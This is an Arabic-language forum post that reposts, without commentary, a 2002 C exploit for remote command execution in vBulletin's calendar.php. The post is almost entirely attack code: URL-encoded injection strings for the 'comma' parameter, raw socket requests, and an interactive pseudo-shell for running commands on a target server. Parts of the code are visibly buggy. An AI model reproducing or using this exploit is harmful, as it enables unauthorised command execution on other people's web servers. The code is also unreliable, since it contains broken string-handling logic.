الحالة
موضوع مغلق

megagame

عضو ذهبي
التسجيل
28/11/03
المشاركات
959
الإعجابات
55
#1
/* php2.c - Vbulletin/calender.php remote command execution exploit
*
* This code is published property of gosper
* leads to gid apache.
*
* thanks and shouts go out to ectos and tgrey ;)
*
* (C) COPYRIGHT Gosper , 2002 - gosper@nix.org
* all rights reserved
***********************************************************************
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define PORT 80
#define MAX 200
#define evil1 "/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60"
#define evil2 "%20%60;die();echo%22"

char exploit(char *host, char *string);
void usage(char *progname);
void interactive(char *host, char *path);
void search_replace(char *string, const char *find, const char *replace);

int main(int argc, char *argv[])
{
char buf[MAX], *command, *path, *host;
int res;
extern char *optarg;

if(argc > 1) {
host = argv[1]; // make things easier
while((res = getopt(argc, argv, "i:c:p:d")) != EOF) {
switch(res){

case 'c': command = optarg;
break;

case 'i': path = optarg;
//sprintf(buf, "GET %s%s%s%s\n" , path , evil1, command, evil2);
interactive(host, path);
//exit(0);
break;

case 'd': printf("%s" , buf);

default: usage(argv[0]);
break;
}

}

sprintf(buf, "GET %s%s%s\n" , evil1, command, evil2);
exploit(host, buf);
}
else
usage(argv[0]);
return 0;

}


char exploit(char *host, char *string){
int fd, data;
char buf[MAX], buf2[999], output[5000];

struct hostent *he;
struct sockaddr_in server;

if((he =gethostbyname(host))==NULL) {
printf("Error unknown host :( \n");
exit(-1);
}

if((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
printf("Couldnt open socket\n");
exit(-1);
}

server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(server.sin_zero),8);

if(connect(fd,(struct sockaddr*)&server,sizeof(struct sockaddr)) == -1){
printf("Couldnt connect to host\n");
exit(-1);
}


send(fd, string, sizeof(buf2), 0);
recv(fd, output, sizeof(output), 0);
printf("%s" , output);

close(fd);
}

void interactive(char *host, char *path) {
char shell[100], temp[MAX], *input;

printf("\n (C) Gosper 2002\n");
printf(" vbull, calendar.php exploit\n");

while(1){
printf("php# ");
fgets(shell, sizeof(shell), stdin);
search_replace(shell, " ", "%20");
input = malloc(strlen(shell)*sizeof(char));
memcpy(input, shell, strlen(shell)-1);
sprintf(temp, "GET %s%s%s%s\n" , path , evil1, input, evil2);
exploit(host, temp);
}
}

void search_replace(char *string, const char *find, const char *replace)
{

char final[MAX], temp[2];
size_t start, end, i;
while (strstr(string, find) != NULL) {
final[0] = '\0';
start = strstr(string, find) - string;
end = start + strlen(find);
temp[1] = '\0';
strncat(final, string, start);
strcat(final, replace);
for (i = end; string != '\0'; i++) {
temp[0] = string;
strcat(final, temp);
}
sprintf(string, final);
}
return;
}

void usage(char *progname) {
printf("_________\n");
printf(" calendar.php vbulletin exploit\n");
printf(" (C) COPYRIGHT Gosper 2002\n");
printf(" gosper@nix.org\n\n");
printf(" Usage: %s host -i path to calendar.php\n" , progname);
printf(" Ex: %s 127.0.0.1 -i /bbs\n" , progname);
exit(1);
}
 

الحالة
موضوع مغلق

أعلى